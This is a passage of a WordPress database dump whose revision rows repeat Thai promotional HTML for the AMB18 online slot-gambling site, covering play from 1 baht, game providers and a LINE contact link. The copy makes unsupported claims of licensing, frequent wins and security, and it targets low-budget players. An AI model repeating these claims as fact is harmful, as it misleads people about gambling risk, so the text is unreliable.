src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>AMB18 แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold </b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:15:07','2026-02-26 19:15:07','',44,'https://amb18slot.com/?p=387',0,'revision','',0),(388,3,'2026-02-26 19:16:09','2026-02-26 19:16:09','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างของ AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>AMB18 แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold </b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:16:09','2026-02-26 19:16:09','',44,'https://amb18slot.com/?p=388',0,'revision','',0),(389,3,'2026-02-26 19:16:09','2026-02-26 19:16:09','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างของ AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>AMB18 แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold 